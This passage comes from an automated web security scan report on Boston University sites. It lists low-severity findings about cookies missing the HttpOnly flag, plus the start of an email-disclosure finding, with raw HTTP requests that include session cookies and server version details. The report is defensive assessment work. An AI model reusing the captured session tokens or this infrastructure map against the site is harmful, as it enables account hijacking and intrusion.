Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 02 Mar 2011 16:29:08 GMT
ETag: "1420040800001234-1b28-49d82697dbd01"
Accept-Ranges: bytes
Content-Length: 6952
X-BU-Main-Uniqueid: ToyiUArxHDYAAGUNvhkAAAMS
X-BU-Duration: D=12629
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...

9.32. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin?session=a48b5fc44e9c3778dbfa93d21a2f878d:cussp-srv3&AuthServCd=it_kerb&LoginPromptInd=ON&SidPromptInd=&reason=Initial%2520request%2520for%2520authentication&app=Alumni%2520Directory%2520Harris&contact=%253Ca%2520href%253D%2522mailto%253Aacct-mgr%2540bu.edu%2522%253EAccount%2520Manager%253C%252Fa%253E&ext=alum&OptimisticLoginInd=ON&LoginPromptTime=1317837692&SidCheckPromptTime= HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:01:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Location: https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.8971
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybfQrxHDYAAEnch14AAAKc
X-BU-Duration: D=288046
X-BU-Backend: builtin (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://weblogin.bu.edu/web@login3/1317837693/5
...[SNIP]...

9.33. https://www.bu.edu/link/bin/uiscgi_studentlink  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_studentlink

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link/bin/uiscgi_studentlink HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 17:47:35 GMT
Server: Apache/2.2.0 (BU-Version1)
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyYNwrxHD4AAFEANUgAAAKM
X-BU-Duration: D=361723
X-BU-Backend: builtin (null)
Connection: close

<!-- ----------------------------------------------------------------
This was generated for
at Wed Oct 5 13:47:36 2011
...[SNIP]...

9.34. https://www.bu.edu/phpbin/search/cms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/search/cms.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /phpbin/search/cms.php HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Wed, 05 Oct 2011 18:30:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Location: http://www.bu.edu/phpbin/search/?q=&client=default_frontend&output=xml_no_dtd&proxystylesheet=default_frontend&t=index
Content-Length: 0
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiYwrxHDYAAGV6ygAAAARG
X-BU-Duration: D=34973
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Connection: close


9.35. https://www.bu.edu/phpbin/telegraph/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/telegraph/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /phpbin/telegraph/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: https://www.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bu.edu/alumni-forms/forms/giving/online/index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&p
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybcgrxHDYAAEnbg64AAAQM
X-BU-Duration: D=1007362
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

9.36. https://www.bu.edu/tech/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/about/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/about/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:24 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 67007
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:24 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQArxHDYAAGUNvSUAAAMM
X-BU-Duration: D=8774
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.37. https://www.bu.edu/tech/accounts/wireless/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/accounts/wireless/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/accounts/wireless/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://netreg.bu.edu/faq.cgi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:37 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 17:59:36 GMT
Accept-Ranges: bytes
Content-Length: 69132
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:04:37 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybCQrxHDYAAEY9TssAAAIA
X-BU-Duration: D=9325
X-BU-Backend: niscms http://wwwcms02.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

9.38. https://www.bu.edu/tech/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/contact/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/contact/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:23 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPwrxHDYAAGJWsScAAAFN
X-BU-Duration: D=366081
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.39. https://www.bu.edu/tech/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/feed/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:28 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 18:17:42 GMT
ETag: "999deaaf7fef0449c165077299c01d7a"
Content-Type: text/xml; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiRArxHDYAAGUMuo8AAAKJ
X-BU-Duration: D=224232
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

9.40. https://www.bu.edu/tech/policies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/policies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/policies/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:27 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:19:59 GMT
Accept-Ranges: bytes
Content-Length: 68846
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:27 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQwrxHDYAAGUNvWMAAAMB
X-BU-Duration: D=8720
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.41. https://www.bu.edu/tech/projects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/projects/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/projects/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:26 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 66854
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:26 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQgrxHDYAAGJVrYoAAAHY
X-BU-Duration: D=10295
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.42. https://www.bu.edu/tech/service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/service/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/service/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:25 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:24 GMT
Accept-Ranges: bytes
Content-Length: 67216
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:25 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQQrxHDYAAGUMumgAAAKZ
X-BU-Duration: D=11105
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

9.43. https://www.bu.edu/tech/services/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/alumni/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:22 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPgrxHDYAAGUMulEAAAKP
X-BU-Duration: D=386473
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.44. https://www.bu.edu/tech/services/departments/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/departments/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/departments/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:21 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:20 GMT
Accept-Ranges: bytes
Content-Length: 108281
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:21 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPQrxHDYAAGJWsQ4AAAFU
X-BU-Duration: D=10019
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.45. https://www.bu.edu/tech/services/faculty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/faculty/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/faculty/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:52 GMT
Accept-Ranges: bytes
Content-Length: 105352
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGJWsOoAAAFG
X-BU-Duration: D=8712
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.46. https://www.bu.edu/tech/services/researchers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/researchers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/researchers/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:18 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:17 GMT
Accept-Ranges: bytes
Content-Length: 98337
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:18 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOgrxHDYAAGJWsPgAAAFY
X-BU-Duration: D=9158
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.47. https://www.bu.edu/tech/services/staff/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/staff/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/staff/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:19 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:18 GMT
Accept-Ranges: bytes
Content-Length: 104691
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:19 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOwrxHDYAAGJVrSYAAAHG
X-BU-Duration: D=23961
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.48. https://www.bu.edu/tech/services/students/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/students/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/students/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:45 GMT
Accept-Ranges: bytes
Content-Length: 92477
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGUNvMsAAAMY
X-BU-Duration: D=10392
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

10. Email addresses disclosed  previous  next
There are 28 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


10.1. https://weblogin.bu.edu/accounts/bulogin-forgotaccount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/bulogin-forgotaccount

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/bulogin-forgotaccount?template_extension=forgot&_last_name=xss&_email_address=xss HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
